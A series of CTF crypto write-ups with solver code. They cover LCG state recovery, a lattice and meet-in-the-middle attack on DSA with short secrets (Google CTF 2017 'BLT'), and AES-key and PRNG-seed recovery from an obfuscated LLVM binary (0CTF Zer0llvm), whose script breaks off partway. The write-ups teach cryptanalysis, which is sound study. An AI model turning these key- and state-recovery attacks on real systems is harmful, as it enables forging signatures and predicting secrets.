In this challenge we have an LCG generator. We can query it up to 10 times and then we have to predict the correct value more than 100 times. So we have to recover the state from the 10 outputs.

self.a = 0x66e158441b6995
self.b = 0xB
self.nbits = 85    # should be enough to prevent bruteforcing

def nextint(self):
    self.state = ((self.a * self.state) + self.b) % (1 << self.nbits)
    return self.state >> (self.nbits - 32)

Interestingly, the modulus is $2^{85}$, and this is a weak point: the diffusion between different bits is limited. More precisely, high bits will never affect low bits. But the problem is that the LCG outputs the $32$ highest bits, and these bits depend both on low and high bits.

At the beginning we have no information about the state at all. After one output we know $32$ bits of the state. So, it is better to start attacking the second output and the effective unknown state size is $53$ bits.

Let’s analyze how the two parts of the state interact. To do this, we represent states and coefficients in the form

$$s=2^{53}s_1+s_0, ~\text{where}~ s_0 < 2^{53}.$$

That is, $s_1$ are the $32$ highest bits of $s$, $s_0$ are the $53$ lowest bits of $s$. Consider the step:

$$ \begin{align} s' &= (a \cdot s+b) \mod{2^{85}} = \\ &= \bigg((2^{53}a_1 + a_0) (2^{53}s_1 + s_0) + b\bigg) \mod {2^{85}} \\ &= 2^{53}\bigg(s_1a_0 + s_0a_1 + \bigg\lfloor \frac{s_0a_0+b}{2^{53}} \bigg\rfloor\bigg ) \mod{2^{85}} + (s_0a_0+b) \mod{2^{53}}. \end{align} $$

Note that we observe the high part:

$$out = \bigg(s_1a_0 + s_0a_1 + \bigg\lfloor \frac{s_0a_0+b}{2^{53}} \bigg\rfloor \bigg) \mod{2^{32}}.$$

We know $s_1a_0$. Note that in the challenge $a=\mathtt{0x66e158441b6995}$ with $a_1=3, a_0=\mathtt{0x6e158441b6995}$. Due to small $a_1$, the highest bits of $s_0a_1$ do not depend strongly on the lowest bits of $s_0$. Moreover, this is true in the floored fraction as well. To analyze this properly, let's split $s_0$ as

$$s_0 = 2^t h+l, ~\text{for}~ l < 2^t ~\text{and some}~ t.$$

From now on we consider everything $\mod{2^{32}}$. The idea is that $h$ are some highest bits of $s_0$. We guess them and then we will try to check our guess.

$$out - s_1a_0 = (2^th+l)a_1 + \bigg\lfloor \frac{(2^th+l)a_0+b}{2^{53}} \bigg\rfloor.$$

Note that in the challenge $b=11$ and it very rarely affects the flooring, so we can omit it. We can also split the fraction into two summands and the result will decrease by at most one:

$$out - s_1a_0 = 2^th\cdot a_1+l\cdot a_1 + \bigg\lfloor \frac{2^th\cdot a_0}{2^{53}} \bigg\rfloor + \bigg\lfloor \frac{l\cdot a_0}{2^{53}} \bigg\rfloor \stackrel{?}{+} 1.$$

$$out - s_1a_0 - 2^th\cdot a_1 - \bigg\lfloor \frac{2^th\cdot a_0}{2^{53}} \bigg\rfloor = l\cdot a_1 + \bigg\lfloor \frac{l\cdot a_0}{2^{53}} \bigg\rfloor \stackrel{?}{+} 1.$$

Note that $a_0 < 2^{53}$ and also recall that $a_1 = 3$:

$$out - s_1a_0 - 2^th\cdot a_1 - \bigg\lfloor \frac{2^th\cdot a_0}{2^{53}} \bigg\rfloor \le l\cdot (a_1+1) < 2^t\cdot4.$$

Once we guess $h$ for small enough $t$, we can compute the left part of this inequality and check the bound. Note that we must be careful with modulo $2^{32}$. Since the right half is smaller than the modulus, we can compute the left half modulo $2^{32}$ and check the inequality.
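The decomposition and the final bound can be checked numerically. The Python 3 sketch below is separate from the solution script further down: it only verifies that the formula for $out$ matches a real LCG step and that the inequality holds for the true top bits $h$ at every $t \le 29$. The helper names `predicted_output` and `bound_holds` are assumptions for this sketch.

```python
import random

A = 0x66e158441b6995
B = 0xB
NBITS, LOW = 85, 53
MASK32 = (1 << 32) - 1


def split(v):
    """Split a value into (high part, low 53 bits)."""
    return v >> LOW, v & ((1 << LOW) - 1)


a1, a0 = split(A)            # a1 == 3 in the challenge


def step(state):
    """One LCG step on the full 85-bit state."""
    return (A * state + B) % (1 << NBITS)


def predicted_output(s1, s0):
    """The observed 32 high bits, written via the two state halves."""
    return (s1 * a0 + s0 * a1 + ((s0 * a0 + B) >> LOW)) & MASK32


def bound_holds(s1, s0, out, t):
    """Check the filter inequality for the true top bits h = s0 >> t."""
    h = s0 >> t
    left = (out - s1 * a0 - (h << t) * a1 - (((h << t) * a0) >> LOW)) & MASK32
    return left < 4 * (1 << t)


rng = random.Random(1)
state = rng.getrandbits(NBITS)
s1, s0 = split(state)
out = step(state) >> LOW
print(out == predicted_output(s1, s0), bound_holds(s1, s0, out, 29))
```

A wrong guess of $h$ passes the same check only by chance, which is what gives the search its filtering power.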

What $t$ should we choose? Since the left half is bounded by $2^{32}$, we want the right half to be restrictive. For example, $t=29$ has filtering power of around $1/2$. To get to $t=29$ we need to bruteforce $53-29=24$ highest bits of $s_0$. After that the number of candidates will decrease quickly.

With pypy this quite short solution runs for about 2 minutes, which is longer than the challenge allows, but if we try just a few times we have a good chance of recovering the state within the allowed timespan.

gist

#-*- coding:utf-8 -*-

import random

class LinearCongruentialGenerator:
    def __init__(self, a, b, nbits):
        self.a = a
        self.b = b
        self.nbits = nbits
        self.state = random.randint(0, 1 << nbits)

    def nextint(self):
        self.state = ((self.a * self.state) + self.b) % (1 << self.nbits)
        return self.state >> (self.nbits - 32)

def split(x):
    return ((x >> 53) % 2**32, x % 2**53 )

MASK32 = 2**32-1
MASK53 = 2**53-1
MASK85 = 2**85-1

a = 0x66e158441b6995
b = 0xB
a1, a0 = split(a)

generator = LinearCongruentialGenerator(a, b, 85)

n1 = generator.nextint()
SECRET_STATE1 = generator.state
n2 = generator.nextint()
n3 = generator.nextint()

def recurse(h, t):
    if t == 0:
        # Final check of the candidate
        s = (s1 << 53) | h
        s = (a*s + b) & MASK85
        if s >> 53 != n2:
            return
        s = (a*s + b) & MASK85
        if s >> 53 != n3:
            return
        print "CORRECT!", h
        return h

    t -= 1
    h <<= 1
    for bit in xrange(2):
        h |= bit

        # delta = val - ( 2**t*h*a1 + 2**t*h*a0/2**53 ) % 2**32
        delta = val - ( (h+h+h<<t) + ((h*a0<<t)>>53) )
        delta &= MASK32
        if delta < 4*2**t:
            res = recurse(h, t)
            if res:
                return res

# s1, s0 = split(SECRET_STATE1)

s1 = n1
out = n2
val = (out - s1*a0) % 2**32

for top in xrange(2**24):
    if top & 0xffff == 0:
        print hex(top)
    # top = s0 >> 29
    s0 = recurse(top, 29)
    if s0:
        print "Found solution!", s0
        break

mygen = LinearCongruentialGenerator(a, b, 85)
mygen.state = (s1 << 53) | s0
assert mygen.nextint() == n2
assert mygen.nextint() == n3
for i in xrange(1000):
    assert mygen.nextint() == generator.nextint()
print "Outputs predicted correctly"

The flag: flag{LCG_1s_m0re_brok3n_th4n_you_th!nk}

UPD: Thanks to Niklas for pointing out that this can be solved straightforwardly with Mathematica.

Google CTF 2017 Quals – BLT (Bleichenbacher’s Lattice Task – Insanity Check)

hellman — Mon, 19 Jun 2017 08:39:32 +0000

A slow descent into the dark, into madness, futility, and despair.

BLT.jar (not necessary)
STDOUT
Flag.java

Summary: DSA with short secrets, lattice + meet-in-the-middle attack.

In this challenge we are given a jar file, a Java source file and an output file. The jar file contains several pictures heavily hinting at lattices (and maybe at something else?). As we will see, Flag.java and STDOUT are enough to solve the challenge.

The Java program performs a DSA signature with random private and ephemeral keys. The output is given and our goal is to recover the private key. The scheme indeed looks like proper DSA and is hard to break. However, if you run the program with random parameters, you may notice that the generated private keys are much smaller than they should be. At first I thought the Flag.class file was backdoored, but it turned out to be quite a funny bug in the Java code. Consider the function that generates the secrets:

// Generate a random integer in the range 1 .. q-1.
private static BigInteger generateSecret(BigInteger q) {
  // Get the number of bits of q.
  int qBits = q.bitCount();

  SecureRandom rand = new SecureRandom();
  while (true) {
    BigInteger x = new BigInteger(qBits, rand);
    if (x.compareTo(BigInteger.ZERO) == 1 && x.compareTo(q) == -1) {
      return x;
    }
  }
}

Seems legit? Until you read that the BigInteger.bitCount method actually returns the Hamming weight, not the bit size of the number! The Hamming weight of a random prime is about half its bit length: for a 256-bit $q$ the secret keys would be roughly 128 bits long. This would be relatively easy, so the author decided to use $q$ with Hamming weight 150!
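The difference between the two quantities is easy to see in Python. This is only an illustration of the bug, using the value of $q$ that appears as Q in the solution script; in Java the intended call would have been `bitLength()` rather than `bitCount()`.

```python
# Modulus q of the challenge (the constant Q of the solution script).
q = 81090202316656819994650163122592145880088893063907447574390172288558447451623

bit_length = q.bit_length()            # what generateSecret() meant to use
hamming_weight = bin(q).count("1")     # what BigInteger.bitCount() returns

print("bit length:    ", bit_length)
print("Hamming weight:", hamming_weight)
```

Since the generated secrets have only `hamming_weight` random bits, they are much shorter than $q$.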

Here are details of the scheme:

$p$ is 2048-bit prime, $g$ is an element of order $q$ mod $p$ ($q$ is 256-bit prime).
$x$ is a 256-bit private key, $y=g^x \mod p$ is a 2048-bit public key.
To sign a message $m$:
- generate an ephemeral 256-bit key $k$;
- compute $r = g^k \mod p \mod q$;
- compute $s = (h(m) + xr)/k \mod q$;
- $(r,s)$ is the signature.

The unknowns are $x$ and $k$. Due to the bug/backdoor, they are 150 bits long instead of 256. In such cases lattices come to mind, since they are often used to find small solutions to various equations.

One interesting equation we have is

$$sk \equiv h(m) + xr \pmod{q}.$$

I found the following approach in a paper about attacking DSA, which I unfortunately cannot locate anymore. Let’s make the equation monic in one variable:

$$k - h(m)/s - xr/s \equiv 0 \pmod{q}.$$

Writing $A = -r/s \bmod q$ and $B = -h(m)/s \bmod q$, this becomes

$$k + B + Ax \equiv 0 \pmod{q}.$$
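The rearrangement can be checked on a toy DSA instance. The sketch below uses tiny illustrative parameters ($p = 607$, $q = 101$), which are our assumption and have nothing to do with the challenge values; it requires Python 3.8+ for modular inverses via `pow`.

```python
import random

# Toy DSA group (illustrative values, far too small for real use):
# q divides p - 1 and g has order q modulo p.
p, q = 607, 101
g = pow(2, (p - 1) // q, p)

rng = random.Random(1)
while True:
    x = rng.randrange(1, q)              # private key
    k = rng.randrange(1, q)              # ephemeral key
    h = rng.randrange(q)                 # stands in for h(m)
    r = pow(g, k, p) % q
    s = (h + x * r) * pow(k, -1, q) % q
    if r and s:                          # DSA rejects r == 0 or s == 0
        break

# Coefficients of the monic linear relation k + B + A*x = 0 (mod q).
s_inv = pow(s, -1, q)
A = -r * s_inv % q
B = -h * s_inv % q
assert (k + B + A * x) % q == 0
```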

Assume that we know bounds on $x$ and $k$, $X$ and $K$ respectively. Then we can build the following lattice (the basis vectors are rows):

$$
\begin{pmatrix}
q & 0 & 0 \\
0 & qX & 0 \\
B & AX & K \\
\end{pmatrix}
$$

Basically we encode the equation and add two additional vectors to encode modular reductions. If $XK < q - \epsilon$ then the $LLL$-reduced basis of this lattice will contain two linear equations holding over integers with roots $x$ and $k$. Unfortunately, the secrets are 150 bits instead of 128 so the bound does not hold. We can try to guess some higher bits and run the LLL attack each time, but we need to guess roughly $300-256=44$ bits which is too much.

It is easy to get some solution within the bounds. There are roughly $2^{44}$ of them and we actually need to check all of them! One check can be to verify $x$ against the public key $y = g^x \mod p$. Another way is to use $h(x)$ given in STDOUT, which is probably faster, but still too slow.

Let’s think how to generate all solutions for the given bounds once we have some solution. If $k_0 + B + Ax_0 \equiv 0$, then we want to find small $\Delta_k, \Delta_x$ such that

$$(k_0 + \Delta_k) + B + A(x_0 + \Delta_x) \equiv 0 \pmod{q}.$$

$$\Rightarrow \Delta_k + A\Delta_x \equiv 0 \pmod{q}.$$

Consider the lattice:

$$
\begin{pmatrix}
1 & -A \\
0 & q \\
\end{pmatrix}
$$

The vectors of this lattice are exactly the possible pairs $(\Delta_x,\Delta_k)$. Moreover, the LLL-reduced basis will contain short and somewhat orthogonal vectors $(\Delta_x^{(0)}, \Delta_k^{(0)})$ and $(\Delta_x^{(1)}, \Delta_k^{(1)})$. By adding small multiples of these vectors to $(x_0,k_0)$ we can find almost all solutions up to the bound. Note that we are mostly interested in the $x$ coordinate. The solutions have $x$ of the following form:

$$x = x_0 + i \Delta_x^{(0)} + j \Delta_x^{(1)}$$

where $i,j$ are relatively small integers (up to a few million in our case). That is too many pairs to check one by one… But can we use other equations? At first glance, they are exponential and it is hard to use them here in a way other than simply verifying $x$ or $k$. However, it is actually easy: we can split the search over $i$ and $j$ by using the equation $y = g^x \mod p$. This is similar to Meet-In-The-Middle / Baby-Step-Giant-Step attacks. First, we precompute a table for all $j$: $\{ yg^{-j \Delta_x^{(1)}} \mapsto j\}$. Then we check for all $i$ if $g^{x_0 + i \Delta_x^{(0)}}$ is in the table. When we find it, we can easily compute $x$ from $i$ and $j$!
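The table-based split can be sketched on a toy group. All parameters below (the Mersenne prime $2^{31}-1$ with primitive root 7, and the values of `x0`, `d0`, `d1`, `BOUND`) are assumptions chosen for illustration; `d0` and `d1` play the roles of $\Delta_x^{(0)}$ and $\Delta_x^{(1)}$. Python 3.8+ is assumed for negative exponents in `pow`.

```python
# Toy parameters (assumptions for illustration only).
p = 2**31 - 1          # a Mersenne prime
g = 7                  # a primitive root modulo p
x0, d0, d1 = 10**9, 100003, 17
BOUND = 100            # search |i|, |j| <= BOUND

def mitm(y):
    """Find x = x0 + i*d0 + j*d1 with g^x == y (mod p), or None."""
    # First pass: table of y * g^(-j*d1) -> j.
    table = {}
    step = pow(g, -d1, p)
    cur = y * pow(g, BOUND * d1, p) % p      # value for j = -BOUND
    for j in range(-BOUND, BOUND + 1):
        table[cur] = j
        cur = cur * step % p
    # Second pass: look up g^(x0 + i*d0) for every i.
    step = pow(g, d0, p)
    cur = pow(g, x0 - BOUND * d0, p)         # value for i = -BOUND
    for i in range(-BOUND, BOUND + 1):
        if cur in table:
            return x0 + i * d0 + table[cur] * d1
        cur = cur * step % p
    return None

secret = x0 + 42 * d0 - 73 * d1
assert mitm(pow(g, secret, p)) == secret
```

The cost is about $2 \cdot (2 \cdot \text{BOUND} + 1)$ group operations instead of one check per pair $(i, j)$.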

Here is the full Sage code; it finds the flag in a few minutes:

from sage.all import *

Y = 4675975961034321318962575265110114310875697301524971406479091223605006115642041321079605682629390144148862285125353335575850114862081357772478008490889403608973023515499959473374820321940514939155187478991555363073408293339373770407404120884229693036839637631846964085605936966005664594330150750220123106270473482589454510979171010750141467635389981140248292523060541588378749922037870081811431605806877184957731660006793364727129226828277168254826229733536459158767652636094988369367622055662565355698632032334469812735980006733267919815359221578068741143213061033728991446898051375393719722707555958912382769606279
P = 32163437489387646882545837937802838313337646833974044466731567532754579958012875893665844191303548189492604123505522382770478442837553069890471993483164949504735527438665048438808440494922021062011062567528480025060283867381823427214512155583444236623145440836252289902783715682554658231606320310129833109191138313801289027627739243726679212643242494506530838323607821437997048235272405577079630284307474612832155381483129670050964475785090109743586694668757059662450206919471125303517989042945192886030308203029077484932328302318567286732217365609075794327329327141979774234522455646843538377559711464098301949684161
Q = 81090202316656819994650163122592145880088893063907447574390172288558447451623
H = 88030618649759997479497646248126770071813905558516408828543254210959719582166
R = 34644971883866574753209424578777685962679178432833890467656897732184789528635
S = 19288448359668464692653054736434794709227686774726460500150496018082350808676
G = pow(2, int(P//Q), P)

A = (-R) * inverse_mod(S, Q) % Q
B = (-H) * inverse_mod(S, Q) % Q

while 1:
    XB = 125
    KB = 125-16
    X = 2**XB
    K = 2**KB
    khigh = randint(0, 2**16)
    Bnew = B + khigh * 2**KB

    m = matrix(ZZ, 3, 3, [
        Q,    0,      0,
        0,    Q * X,  0,
        Bnew, A * X,  K
    ]).LLL()

    mat = []
    target = []
    for row in m[:2]:
        const, cx, ck = row
        assert cx % X == 0 and ck % K == 0
        mat.append([cx / X, ck / K])
        target.append(-const)

    mat = matrix(ZZ, mat)
    try:
        x0, k0 = mat.solve_right(vector(ZZ, target))
        if int(x0) != x0 or int(k0) != k0:
            continue
    except ValueError:
        continue
    x0, k0 = int(x0), int(k0)

    assert (A * x0 + k0 + Bnew) % Q == 0
    k0 += khigh * 2**KB
    assert (A * x0 + k0 + B) % Q == 0

    print "SOLUTION", x0, k0
    print "SIZE %.02f %.02f" % (RR(log(abs(x0), 2)), RR(log(abs(k0), 2)))
    break


BOUND1 = 10**7
BOUND2 = 10**7

MZ = matrix(ZZ, 2, 2, [
    [1, -A],
    [0, Q],
]).LLL()

DX1 = abs(MZ[0][0])
DX2 = abs(MZ[1][0])

print "STEP1"
table = {}
step = pow(G, DX2, P)
curg = Y * inverse_mod( int(pow(step, BOUND1, P)), P ) % P
cure = -BOUND1
for i in xrange(-BOUND1, BOUND1):
    if i % 100000 == 0:
        print i / 100000, "/", BOUND1 / 100000
    assert curg not in table
    table[curg] = cure
    curg = (curg * step) % P
    cure += 1
print

print "STEP2"
step = pow(G, DX1, P)
curg = pow(G, x0 - DX1 * BOUND2, P)
cure = -BOUND2
for i in xrange(-BOUND2, BOUND2):
    if i % 100000 == 0:
        print i / 100000, "/", BOUND2 / 100000
    if curg in table:
        print "Solved!", cure, table[curg]
        ans = x0 + cure * DX1 - table[curg] * DX2
        print "Flag: CTF{%d}" % ans
        break
    curg = (curg * step) % P
    cure += 1

The flag: CTF{848525996645405165419773118980458599114509814}

Google CTF 2017 Quals – Crypto writeups

hellman — Mon, 19 Jun 2017 08:39:29 +0000

Scripts with short explanations for all crypto tasks (except RSA) from Google CTF Quals 2017:

Crypto Backdoor
Introspective CRC
Shake It
RSA CTF Challenge (no writeup, but I think it’s similar to this old one)
Rubik
Bleichenbacher’s Lattice Task (full writeup here)

0CTF 2017 Quals – Zer0llvm

hellman — Mon, 20 Mar 2017 07:54:22 +0000

Talent Yang loves to customize his own obfuscator. Unfortunately, he lost his seed when he was watching Arsenal’s UEFA game. What a sad day! His team and his seed were lost together. To save him, could you help him to get back his seed? We can not save the game, but we may be able to find out his seed.
Compile: ollvm.clang -Xclang -load -Xclang lib0opsPass.so -mllvm -oopsSeed=THIS_IS_A_FAKE_SEED source.c
Clang && LLVM Version: 3.9.1
link
flag format: flag{seed}

Summary: deobfuscating and attacking AES parts.

In this challenge we are given an obfuscation plugin for llvm and an obfuscated binary. The plugin accepts a 16-byte seed as a parameter and uses it for internal PRNG. Our goal is to analyze the binary and recover the seed from it.

The binary is basically a big state machine. Here is the start of the main function:

.text:4004C0 main:           ; DATA XREF: _start+1D
.text:4004C0     push rbp
.text:4004C1     mov  rbp, rsp
.text:4004C4     sub  rsp, 4038Ch
.text:4004CB     mov  dword ptr [rbp-4], 0
.text:4004D2     mov  dword ptr [rbp-8], 46544330h
.text:4004D9     mov  dword ptr [rbp-0Ch], 4E52BCE7h
.text:4004E0
.text:4004E0 main_switch:       ; CODE XREF: .text:loc_7635AC
.text:4004E0     mov  eax, [rbp-0Ch]
.text:4004E3     mov  ecx, eax
.text:4004E5     sub  ecx, 8000DEEAh
.text:4004EB     mov  [rbp-10h], eax
.text:4004EE     mov  [rbp-14h], ecx
.text:4004F1     jz   loc_728049
.text:4004F7     jmp  $+5
.text:4004FC
.text:4004FC loc_4004FC:        ; CODE XREF: .text:00000000004004F7
.text:4004FC     mov  eax, [rbp-10h]
.text:4004FF     sub  eax, 8001EACAh
.text:400504     mov  [rbp-18h], eax
.text:400507     jz   loc_73E38A
.text:40050D     jmp  $+5
.text:400512
.text:400512 loc_400512:        ; CODE XREF: .text:000000000040050D
.text:400512     mov  eax, [rbp-10h]
.text:400515     sub  eax, 8003CC64h
.text:40051A     mov  [rbp-1Ch], eax
.text:40051D     jz   loc_5C0C95
.text:400523     jmp  $+5
...

In pseudocode, it could be something like this:

state = 0x4E52BCE7
main_switch:
switch(state) {
    case 0x8000DEEA: goto loc_728049;
    case 0x8001EACA: goto loc_73E38A;
    case 0x8003CC64: goto loc_5C0C95;
    ...
}
loc_xxxxxx:
   // do something
   state = 0x8003CC64
   goto main_switch

Note that the state ids are sorted as signed 32-bit integers. Also, during the case probing, some intermediate data is written to the stack (i.e. [rbp-14h] and lower), but there are no further reads from that area. By running the binary and checking for system calls with strace we can see that it does not do anything useful. Let’s look at the llvm plugin to see how the seed is used.

lib0opsPass.so

The plugin is written in C++ and exports a bunch of functions. The main function of our interest is Oops::OopsFlattening::flatten(). Though it’s quite big, we can quickly locate interesting parts by looking at cross-references from crypto-related functions.

First it calls prng_seed to seed its internal PRNG state:

Oops::CryptoUtils::prng_seed(cryptoutils, &seed_string);

Then it uses the PRNG to generate 16 bytes:

memset(&key, 0, 0x20uLL);
LODWORD(cryptoutils_) = llvm::ManagedStatic::operator->(&Oops::Oopscryptoutils, 0LL);
Oops::CryptoUtils::get_bytes(cryptoutils_, &key, 16);
if ( crc32('FTC0', &key, 3) != 0xF9E319A6 )
...

Note that the hardcoded crc32 check allows us to easily find the first 3 bytes of the generated key: 179, 197, 140.

The key is then used to “scramble” values from a hardcoded array called plains:

LODWORD(plains0) = plains[0];
LODWORD(v35) = llvm::ManagedStatic::operator->(&Oops::Oopscryptoutils, v33);
v36 = plains0;
v37 = Oops::CryptoUtils::scramble32(v35, plains0, &key);
...
v60 = counter++;
plainsCUR = plains[v60];
LODWORD(v62) = llvm::ManagedStatic::operator->(&Oops::Oopscryptoutils, v59);
v63 = Oops::CryptoUtils::scramble32(v62, plainsCUR, &key);

It’s not clear for now how these “scrambled” values are used later. IDA tells us that there are around $2^{16}$ values in the array:

.data:2345E0 ; _DWORD plains[65806]
.data:2345E0 plains          dd 0F6172961h, 0CB973739h, 904F3728h, 0DB7194B9h, 81E0B166h
...

Probably it is possible to look at the LLVM-related code and see how exactly these values are used. But in the obfuscated binary there are not so many random-looking words. The only ones which come to mind are the state ids!

Let’s log all the state ids passed to the main_switch. Here is a simple gdb script for it:

$ cat >cmd
set confirm off
set pagination off
break *0x04004e3
commands
p/x $eax
cont
end
run

$ gdb -x cmd -n ./0llvm </dev/null >log
$ head -30 log
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.04) 7.11.1
...
Reading symbols from ./0llvm...(no debugging symbols found)...done.
Breakpoint 1 at 0x4004e3

Breakpoint 1, 0x00000000004004e3 in main ()
$1 = 0x4e52bce7

Breakpoint 1, 0x00000000004004e3 in main ()
$2 = 0x3ac545da

Breakpoint 1, 0x00000000004004e3 in main ()
$3 = 0xff97c58e

Breakpoint 1, 0x00000000004004e3 in main ()
$4 = 0xe83342dd

$ tail log
Breakpoint 1, 0x00000000004004e3 in main ()
$65789 = 0xf1dbf041

Breakpoint 1, 0x00000000004004e3 in main ()
$65790 = 0xdb9a21b8

Breakpoint 1, 0x00000000004004e3 in main ()
$65791 = 0xb02b5689
[Inferior 1 (process 10622) exited with code 027]
(gdb) quit

65791 values! Quite close to the 65806 entries IDA reports for plains. The hypothesis seems to be true. But what does it give us now?

Recovering key

What we have found is $\sim 2^{16}$ plaintext/ciphertext pairs under the “scramble32” function. Let’s look at it more closely:

__int64 __fastcall Oops::CryptoUtils::scramble32(
    Oops::CryptoUtils *this, unsigned int x, const char *key)
{
  int v3; // ST20_4@1
  int v4; // ST24_4@1
  int v5; // ST20_4@1

  v3 = AES_PRECOMP_TE3[(x ^ key[3])] ^
       AES_PRECOMP_TE2[(BYTE1(x) ^ key[2])] ^
       AES_PRECOMP_TE1[((x >> 16) ^ key[1])] ^
       AES_PRECOMP_TE0[(BYTE3(x) ^ *key)];
  v4 = AES_PRECOMP_TE3[(v3 ^ key[7])] ^
       AES_PRECOMP_TE2[(BYTE1(v3) ^ key[6])] ^
       AES_PRECOMP_TE1[((v3 >> 16) ^ key[5])] ^
       AES_PRECOMP_TE0[(BYTE3(v3) ^ key[4])];
  v5 = AES_PRECOMP_TE3[(v4 ^ key[11])] ^
       AES_PRECOMP_TE2[(BYTE1(v4) ^ key[10])] ^
       AES_PRECOMP_TE1[((v4 >> 16) ^ key[9])] ^
       AES_PRECOMP_TE0[(BYTE3(v4) ^ key[8])];
  return AES_PRECOMP_TE3[(v5 ^ key[15])] ^
         AES_PRECOMP_TE2[(BYTE1(v5) ^ key[14])] ^
         AES_PRECOMP_TE1[((v5 >> 16) ^ key[13])] ^
         AES_PRECOMP_TE0[(BYTE3(v5) ^ key[12])] ^
         ((key[2] << 8) | (key[1] << 16) | (*key << 24) | key[3]);
}

Interesting, it is related to the AES block cipher. The AES_PRECOMP_TE tables map 8-bit values to 32-bit values. Possibly these tables implement MixColumns, maybe even combined with the S-Boxes and xors. Let's compose them with the inverse of MixColumns (aes.py):

from aes import AES
A = AES()

for i in xrange(4):
    for x, t in enumerate(AES_PRECOMP_TE[i]):
        t = [BYTE3(t), BYTE2(t), BYTE1(t), BYTE0(t)]
        t2 = A.mixColumn(list(t), isInv=True)
        print t2
    print

$ python precomp.py
[99, 0, 0, 0]
[124, 0, 0, 0]
[119, 0, 0, 0]
[123, 0, 0, 0]
[242, 0, 0, 0]
[107, 0, 0, 0]
...

This is the AES SBox applied to one of the bytes! It means that

AES_PRECOMP_TE[i](x) = MixColumns(SBox(x) << 8*i).
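This identity can be reproduced without the binary. The following Python 3 sketch rebuilds the AES S-box and MixColumns from their definitions, forms a T-table entry as a column, and undoes MixColumns again. The function names are ours, and the mapping between the index `i` and the byte position inside the 32-bit word is an assumption.

```python
def gf_mul(a, b):
    """Multiply in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0x100:
            a ^= 0x11B
        b >>= 1
    return r

def rotl8(v, n):
    return ((v << n) | (v >> (8 - n))) & 0xFF

def sbox(x):
    """AES S-box: field inversion followed by the affine map."""
    inv = 0
    if x:
        inv = next(y for y in range(1, 256) if gf_mul(x, y) == 1)
    s = inv
    for n in range(1, 5):
        s ^= rotl8(inv, n)
    return s ^ 0x63

SBOX = [sbox(x) for x in range(256)]
MIX, INV_MIX = [2, 3, 1, 1], [14, 11, 13, 9]   # first rows of the circulant matrices

def circulant_mul(first_row, col):
    """Multiply a 4-byte column by the circulant matrix with the given first row."""
    out = []
    for r in range(4):
        acc = 0
        for c in range(4):
            acc ^= gf_mul(first_row[(c - r) % 4], col[c])
        out.append(acc)
    return out

def te(i, x):
    """T-table entry as a column: MixColumns of S-box(x) placed in row i."""
    col = [0, 0, 0, 0]
    col[i] = SBOX[x]
    return circulant_mul(MIX, col)

# Undoing MixColumns leaves a single S-box output, as observed above.
for i in range(4):
    for x in range(256):
        undone = circulant_mul(INV_MIX, te(i, x))
        assert undone[i] == SBOX[x] and sum(undone) == SBOX[x]
```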

Therefore scramble32 is a 4-round iteration of XorKey, SubBytes, MixColumn followed by another XorKey. How do we recover the key?

Recall that we know key[0], key[1], key[2] from the CRC32 check. We can guess the single byte key[3] and bypass the first round easily. Luckily, the last whitening key is the same as the first one: with the same guess we can decrypt the last round as well! By moving the keys through the linear layers and decrypting the linear layers, we arrive at two rounds:

XK | SB | MC | XK | SB | XK.

Let's use impossible polytopes. Assume that we have three plaintexts of the form (it is probable that we have such among the $2^{16}$ texts by birthday paradox):

X1 = (x1, a, b, c)
X2 = (x2, a, b, c)
X3 = (x3, a, b, c)

We will study how a difference tuple (X1 $\oplus$ X2, X1 $\oplus$ X3) propagates through the cipher. Since it is a difference, it propagates through the key addition untouched. After SubBytes a set of possible difference tuples expands up to $2^8$ elements. Since MixColumn is linear, any difference (x, y) propagates to (MixColumn(x), MixColumn(y)). Therefore, before the last SubBytes layer, we have only $2^8$ possible differences, which can easily be precomputed. Thus, we can recover the last key byte-by-byte: guess byte of the key, decrypt through S-Box, check difference tuple (note that the middle XK does not affect it). We are truncating the differences of 32-bit values to differences of 8-bit values, but this is fine since we look at pairs of differences: $2^8$ possible pairs out of $2^{16}$ give us $1/2^8$ filtration for each key byte. By tracking the first guessed key byte, we can ensure that only the correct key survives.

The full attack implementation is available here.

Recovering Seed

We have recovered the key, but the flag is the PRNG seed! How to recover it? The code for stream generation is as follows:

// in Oops::CryptoUtils::encrypt(Oops::CryptoUtils *this, unsigned __int8 *dst, unsigned __int8 *nonce, unsigned __int8 *seed)
memset(dst, 0, 0x10uLL);
v5 = *(nonce_ + 1);
*buf = *nonce_;
*buf2 = v5;
for ( i = 0; i <= 15; ++i ) {
  seedbyte = seed_[i];
  for ( j = 0; j <= 7; ++j ) {
    if ( seedbyte & 1 ) {
      for ( k = 0; k <= 15; ++k )
        dst[k] ^= buf[k];
    }
    seedbyte = seedbyte >> 1;
    for ( l = 0; l <= 15; ++l )
      buf[l] = TABLE[buf[l]];
  }
}

Here TABLE is an 8-bit nonlinear S-Box. Nonce is constant and hardcoded (note that it is increased by 1 before calling encrypt, as a big-endian number, see Oops::CryptoUtils::inc_ctr):

// in  Oops::CryptoUtils::prng_seed(struct CryptoUtils *cryptoutils, __int64 a2)
noncebuf = cryptoutils->nonce;
*noncebuf = 0xD7C59B4DFFD1E010LL;
*(noncebuf + 1) = 0x20C7C17B250E019ALL;

Though TABLE is nonlinear, the buf array is updated independently and therefore we can see its different versions as constants. Mixing of buf and seed is done linearly, so we can recover the seed from the PRNG output (which is the AES key) by simple linear algebra:

from sage.all import *

from struct import pack, unpack

def tobin(x, n):
    return tuple(map(int, bin(x).lstrip("0b").rjust(n, "0")))

def frombin(v):
    return int("".join(map(str, v)), 2 )

def tobinvec(v):
    return sum( [tobin(c, 8) for c in v], () )

PRNG_OUT = [179, 197, 140, 9, 31, 61, 9, 48, 214, 74, 172, 159, 200, 11, 185, 236]

